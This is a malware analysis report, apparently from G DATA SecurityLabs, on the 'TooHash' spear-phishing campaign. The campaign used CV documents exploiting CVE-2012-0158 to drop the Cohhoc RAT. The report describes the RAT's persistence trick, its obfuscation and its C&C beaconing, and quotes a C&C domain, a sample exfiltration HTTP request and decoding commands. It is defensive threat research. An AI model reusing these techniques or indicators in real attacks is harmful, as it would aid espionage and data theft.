FREE ELECTRONIC LIBRARY - Dissertations, online materials

Pages:   || 2 |

«CONTENTS Executive Summary The Malware used 2 Information Stealing 2 Campaign Analysis Targets 3 Spear Phishing Campaign 3 The Exploit used 3 ...»

-- [ Page 1 ] --






G DATA SecurityLabs Case Study


Executive Summary

The Malware used 2

Information Stealing 2 Campaign Analysis

Targets 3 Spear Phishing Campaign 3 The Exploit used 3 Tracking System 4 Malware Analysis 1: “Cohhoc”, the RAT

Components 5 Variants 5 Persistence 6 Features 6 Obfuscation Layer 7 Network Communication

–  –  –

Executive Summary The experts of G DATA’s SecurityLabs discovered a cyber-espionage campaign that perfectly exemplifies the way how targeted attacks work. The purpose of this campaign was to steal valuable documents from the targeted entity. We entitle this operation “TooHash”.

The attackers’ modus operandi is to carry out spear phishing using a malicious Microsoft Office document as an attachment. The attackers do not choose their targets indiscriminately, which we derive from the fact that they sent specially crafted CV documents, probably to human resources management employees. Naturally, the recipients are inclined to open such documents on a daily base.

The majority of discovered samples were submitted from Taiwan. As part of the documents are in Simplified Chinese which is used in the Chinese mainland and others in Traditional Chinese which is used in Hong Kong, Macao and Taiwan, these malicious documents might have been used against targets in the whole Greater China area.

The Malware used The attached documents exploit a well-known and rather aged vulnerability (CVE-2012-0158) to drop a remote administration tool, or RAT for short, onto the targeted user’s computer. During the campaign, we identified two different pieces of malware. Both include common cyber-espionage components such as code execution, file listing, document exfiltration and more.

We discovered more than 75 command and control servers, all used to administrate infected machines. The servers were mainly located in Hong Kong and the USA. Furthermore, the administration panel’s language, used by the attackers to manage infected systems, was partly written in Chinese and partly in English.

The exploit used by the attackers is identified and blocked by G DATA’s Exploit Protection technology and G DATA’s security solutions detect the dropped binaries as Win32.Trojan.Cohhoc.A and Win32.Trojan.DirectsX.A respectively.

Information Stealing Nowadays, trade secrets describe one of the major values of almost every company. Therefore, begrudged competitors may be tempted to steal valuable sensitive information for their purposes. The leak of sensitive documents can be a disaster for a company and lead to large financial losses. Furthermore, governmental entities use sensitive, private or classified documents. Intelligence agencies may be interested to obtain such documents.

–  –  –

Campaign Analysis Targets The analyzed samples used in the “TooHash” campaign were Microsoft Office documents, and were submitted to us from a Taiwanese customer.

An indication leading to the target area is one of the documents used by the attackers, which contained the string “102年尾牙、” which means “end of the year 102”. The official calendar used in Taiwan starts in 1912 (year 1), so the year 102 is the year 2013 according to the Gregorian calendar (1911+102=2013).

We conclude that the targets are entities located in the Greater China area and on the name of another document used by the attacker called 李辉简历.doc which translates to “resume of Li Hui”.

Another lead, suggesting that the attacks occurred in the Greater China area, is the fact that the majority of samples available on VirusTotal were originally submitted from Taiwan.

The DNS-name of the C&C server contained information about affected companies. Here is a list of some targeted


Public research organization  Space research organization  Telecom companies  Private companies  Spear Phishing Campaign To drop the malware onto the targeted computer and to control the system, the attackers chose to carry out a spear phishing campaign. This campaign comprised a Microsoft Office document being sent to the victim. A probable entry point for a manipulated CV would be an HR department. If the document is opened with an outdated Microsoft Office version, malware is installed by exploiting vulnerability CVE-2012-0158.

To appear credible, the attackers selected the targeted users and the type of the attached documents cleverly. For example, a Microsoft Office Word document called resume of Li Hui.doc. The document title as well as

the content was written in Simplified Chinese. The titles of the attacking documents involved are as follows:

 文件列表.xls (file list) [Simplified Chinese]  李辉简历.doc (resume of Li Hui) [Simplified Chinese]  102年尾牙、103年春酒精緻菜單.xls (End of the year 102, year 103 Spring Menu) [Traditional Chinese] The Exploit used To explain the exploit used, we have a look at the Word document, the ostensible CV. The mentioned exploit causes Microsoft Word to crash, which might alert attacked users just right away. In our case, the attackers crafted their malicious document in a special way to conceal the software crash: The malicious.doc causes a crash, but moments after the crash a legitimate Word session opens up and, to the user, everything appears to be normal.

Nevertheless, cautious users might suspect malicious actions behind such activities and notify security staff.

The CV that comes with the legitimate Word document (Wo.doc) is written in Chinese characters and style used in the Chinese mainland. Nevertheless, this sample has also been submitted to us from Taiwan.

–  –  –

Screenshot 1: Screenshot of the legitimate document which opens after “resume of Li” exploited Word Tracking System The resume visible to the user (Wo.doc) holds a tracking mechanism: Li Hui’s picture, visible in the document as the blank square on the right hand side, is not stored locally but stored on the Internet. The following tag, inside

the document, reveals this function:





MERGEFORMAT \d } As soon as the document is loaded, a network query is performed and notifies the attacker about the successful exploit and the availability of a newly infected machine.

We identified two types of malware used to administrate the infected machines: Cohhoc and DirectsX. The first one is a “classic” Remote Administration Tool. The second one is more advanced and of a different kind, the malware is a rootkit. It is executed in kernel mode.

The RAT and the rootkit both share the same command and control infrastructure.

–  –  –

Malware Analysis 1: “Cohhoc”, the RAT Components

The malware is divided into three parts:

 Component 1: the dropper, used to install the second component into a specific directory and to execute it.

This first file is removed after the execution of the second component;

 Component 2: a binary, used to unpack the third component and to execute it;

 Component 3: the payload; this is the real malicious part, the core of the malware.

The second component is installed into a subfolder of the directory %APPDATA% (for example in %APPDATA%\Microsoft\).

Known file names for the files used during the campaign discussed:

svchost.exe and conime.exe.

The second component works similarly:

 It decrypts the payload. The payload is encrypted with AES. We identified different keys for different samples.

 It then loads the decrypted payload into the memory. Once decrypted, the payload is a Windows dynamic library (.dll).

 It executes the loaded library.

In case you are interested in information regarding the unpacking of this malware, please feel free to contact us using toohash.securityblog@gdata.de Variants During the TooHash campaign, we were able to identify two variants of “Cohhoc”. Those two versions can be

distinguished by looking at the creation of the respective mutex after the malware is started:

 H2_COMMON_DLL (before September 2013)  NEW_H2_COMMON_DLL (after September 2013) Screenshot 2: Mutex creation The main difference between the two malware variants is the handling of the payload (component three). In the earlier version, the payload is located within a resource inside component two. In the later version, the payload is

–  –  –

an additional file. This additional file is stored in the same directory as the second component and its name is brndlog.

As small as this difference seems to be for a normal computer user, from a malware analyst’s point of view, it is a huge difference. If, in the first case, the sample was found within a sample database, the analyst would be able to extract the payload and to analyze it right away. However, in the second case, the analyst cannot extract and analyze the payload at all. In this context, the second component alone is rather useless; one needs to find the binary which installs the payload. Furthermore, it is rather complex to create signature detection for an encrypted file, such as the payload discussed.

Persistence Persistence is ensured by the creation of a shortcut file (.lnk) in the Start Menu folder. This shortcut is labeled as Internet Explorer.lnk. The blank space just before the file name extension was inserted to trick the user.

The text looks exactly like the original without the additional space. Furthermore, it is not only the file’s name which sidetracks, but also the icon used for this link comes in the disguise of Microsoft’s Internet Explorer. The screenshot below reveals that the actual file behind this shortcut points

to a different program: conime.exe:

Features The “Cohhoc” malware is a Remote Administration Tool and

is able to:

execute commands or scripts;

 download files;

 upload files;

 collect information about the infected system, for  example hostname, username, version of the operating system, installed software; Screenshot 3: Shortcut, used to guarantee persistence  find specific documents in order to send them to the command and control servers.

Within the samples, we found two different hardcoded command and control servers and a feature to easily choose an alternative server. If the file %APPDATA%\Adobe\ActiveX.dat exists on the system, the malware uses the server listed in this file instead of the hardcoded servers. The content in the file must use the obfuscation system described in the next chapter.

This approach, using an extra file with server information, proves to be particularly useful for the attackers, as they do not have to transmit new payload to the infected system. Furthermore, it keeps analysts in the dark about additional C&Cs in case they only see the.dat file. This file alone is rather useless. We have seen the same technique when looking at the differences between the two malware variants before.

Copyright © 2014 G DATA Software AG 6 G DATA SecurityLabs Case Study Obfuscation Layer The “Cohhoc” malware uses an obfuscation layer, to disguise the malware and to complicate the analysis. The

obfuscation is used:

 to encode the command and controls;

 to encode the data sent to the command and controls (information and documents);

 to decode the data received from the command and controls (the commands).

Screenshot 5: Algorithm used to decode the data Screenshot 4: Algorithm used to encode the data This algorithm can easily be adapted in C language. Fellow researchers are welcome to receive the code after contacting samplerequest@gdata.de.

To be readable and easily usable, the base64 encoded data (in binary format) is converted into ASCII. Here is an

example to decode a command and control:

paul@gdata:~$ echo 3d3duIWRvYmVzZXJ2aWNlbi5ldE= | base64 -d |./obfuscation –d www.adobeservice.net Network Communication The malware uses HTTP to communicate to the command and control servers. Here is an example of a request

performed by an infected system:

GET /CgAAAAAAAABhAAAAYQAAAMjAxNCA1MiRgNzEzIDMzNAxhcHRvcExhYkAAAAAADGFwdG9wTGF iXHBhdWxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABdpbmRvd3NY UEAAADEwHHExHHEwAAAAAAo HTTP/1.1 X-MU-Session-ID: 765592219 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;

InfoPath.2;.NET CLR 2.0.50727;.NET CLR 3.0.4506.2152;.NET CLR 3.5.30729;.NET4.0C;.NET4.0E)

–  –  –

Host: www.adobeservice.net Connection: Keep-Alive Cache-Control: no-cache Pragma: no-cache The relevant data is placed after the GET request. Here is the content of the request, decoded by using the code

mentioned above:

Here are the different parts of the data transmitted:

Green: the current date and time;

 Pink: the hostname of the infected machine;

 Blue: the domain and the username of the infected machine;

 Yellow: the version of the operation system;

 Red: a hardcoded string which means “end of message”.

 paul@gdata:~ $ cat CgAAAAAAAABhAAAAYQAAAMj[…] |base64 -d |./common –d | cat -e M-^B^@^@^@^@^@^@^@X^@^@^@X^@^@^@2014 52d 713 334LaptopLab^@^@^@^@^@LaptopLab\paul^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@WindowsXP^@^@^@10\11\10^@^ @^@^@$

–  –  –

Pages:   || 2 |

Similar works:

«SUBURBAN REVISIONS A Thesis Presented to The Academic Faculty By Alyssa Shank Durden In Partial Fulfillment Of the Requirements for the Degree Master of Architecture I Georgia Institute of Technology August, 2005 SUBURBAN REVISIONS Approved by: Richard Dagenhart, Advisor College of Architecture Michael Dobbins College of Architecture Michael Gamble College of Architecture Date Approved: May 16, 2005 ii to my grandmother, Mary Ellen Shank, who inspired me to write and encouraged me to draw since...»

«PRODUCT MONOGRAPH Biphentin® (methylphenidate hydrochloride controlled release capsules) 10, 15, 20, 30, 40, 50, 60 and 80 mg Central Nervous System Stimulant Purdue Pharma 575 Granite Court Pickering, ON L1W 3W8 DATE OF REVISION: June 10, 2016 Control No.: 179185 Biphentin® is a trademark of Purdue Pharma Biphentin® (methylphenidate HCl CR capsules) Page 1 of 39 NAME OF DRUG Biphentin® (methylphenidate hydrochloride controlled release capsules) 10, 15, 20, 30, 40, 50, 60 and 80 mg...»

«Merchandising the Postwar Model House at the Parade of Homes by Samuel Tommy Dodd, B.A. Thesis Presented to the Faculty of the Graduate School of the University of Texas at Austin in Partial Fulfillment of the Requirements for the Degree of Master of Arts The University of Texas at Austin August 2009 The Thesis committee for Samuel Tommy Dodd Certifies that this is the approved version of the following thesis: Merchandising the Postwar Model House at the Parade of Homes APPROVED BY SUPERVISING...»

«Ipek Çalislar: Latife Hanim Turkish, Biography Report by Moris Farhi Latife Hanim – “Hanim” means “Lady” in Turkish – was the wife of Mustafa Kemal (of Gallipoli fame), the founder and first president of modern Turkey later to be known as Atatürk, “Father of the Turks”. (Note: I will refer to Mustafa Kemal as Atatürk throughout this report even though the cognomen was conferred on him long after his marriage to Latife Hanim.) In the main, this biography concentrates on Latife...»

«Brno Studies in English Volume 38, No. 2, 2012 ISSN 0524-6881 DOI: 10.5817/BSE2012-2-10 Reviews Carol Berkenkotter, Vijay K. Bhatia and Maurizio Gotti (eds.): Insights into Academic Genres. Bern: Peter Lang, 2012. ISBN 978-3-0343-1211-0, 468 pp. Over the eleven years since its establishment in 2001, the series “Linguistic Insights” has won very positive recognition among scholars in various disciplines of linguistics. The series, issued by the publishing house Peter Lang and under the...»

«ARTICLES SUBURBAN SOCIO-SPATIAL POLARISATION AND HOUSE PRICE CHANGE IN MELBOURNE: 1986 – 1996 Margaret Reynolds, Research Fellow, School of Geography & Environmental Science, Monash University Correspondence to Margaret Reynolds: Margaret.Reynolds@arts.monash.edu.au Associate Professor Maryann Wulff, School of Geography and Environmental Science, Monash University Correspondence to Maryann Wulff: Maryann.Wulff@arts.monash.edu.au This study examines the process and pattern of spatial...»

«For immediate release NEWS RELEASE CapitaLand partners People’s Association to enhance the nutritional well-being of 1,000 underprivileged children in Singapore On Children’s Day, CapitaLand Hope Foundation donates S$500,000 to extend the reach of its Kids’ Food Fund programme to more children through the People’s Association and Community Development Councils Singapore, 4 October 2013 – Celebrations for Children’s Day this year was made more meaningful today with the partnership...»

«HIGHLIGHTS OF PRESCRIBING INFORMATION Wean patients slowly from systemic corticosteroids if transferring These highlights do not include all the information needed to use to ASMANEX HFA. (5.4) ASMANEX HFA safely and effectively. See full prescribing  Hypercorticism and adrenal suppression: May occur with very high information for ASMANEX HFA. dosages or at the regular dosage in susceptible individuals. If such changes occur, discontinue ASMANEX HFA slowly. (5.5) ASMANEX® HFA (mometasone...»

«OXYCHEM C AUSTIC S ODA H ANDBOOK Occidental Chemical Corporation (OxyChem) is a leading North American manufacturer of polyvinyl chloride (PVC) resins, chlorine and caustic soda, key building blocks for a variety of indispensable products such as plastics, pharmaceuticals and water treatment chemicals. Other OxyChem products include caustic potash, chlorinated organics, sodium silicates, chlorinated isocyanurates and calcium chloride. For every product it makes, OxyChem’s market position is...»

«Haldex Automates Lean Manufacturing Processes and Streamlines Operations with Microsoft Dynamics AX The phased implementation of Microsoft Dynamics AX and eBECS’ Lean Automotive for Dynamics AX supports Haldex’s vision and fundamental commitment to achieving world class productivity while developing their employees’ competence and creativity. Haldex has already implemented Microsoft Dynamics AX in operations across the USA and Canada, and is » continuing the global rollout through 2006....»

«ALESSE® 28 Tablets (levonorgestrel and ethinyl estradiol tablets) Rx only Patients should be counseled that oral contraceptives do not protect against transmission of HIV (AIDS) and other sexually transmitted diseases (STDs) such as chlamydia, genital herpes, genital warts, gonorrhea, hepatitis B, and syphilis.DESCRIPTION 21 pink active tablets each containing 0.10 mg of levonorgestrel, d(-)-13β-ethyl-17α-ethinyl17β-hydroxygon-4-en-3-one, a totally synthetic progestogen, and 0.02 mg of...»

«Membership & Levy Consultation Feedback Association Chair Informal Feedback Associations chairs were asked to give their views informally, that is their personal views rather than an association view – simply because many associations do not hold meetings during the 3-month consultation period. Option 1 2 3 Other Yes 1 2 3 1 ? Yes Yes 1 1 1 1 No 1 Alternatives See notes 1 Key points made during the discussions: 1. Option 2 preferred, a continuation of the 1:3 balance that feels right; feels...»

<<  HOME   |    CONTACTS
2016 www.dissertation.xlibx.info - Dissertations, online materials

Materials of this site are available for review, all rights belong to their respective owners.
If you do not agree with the fact that your material is placed on this site, please, email us, we will within 1-2 business days delete him.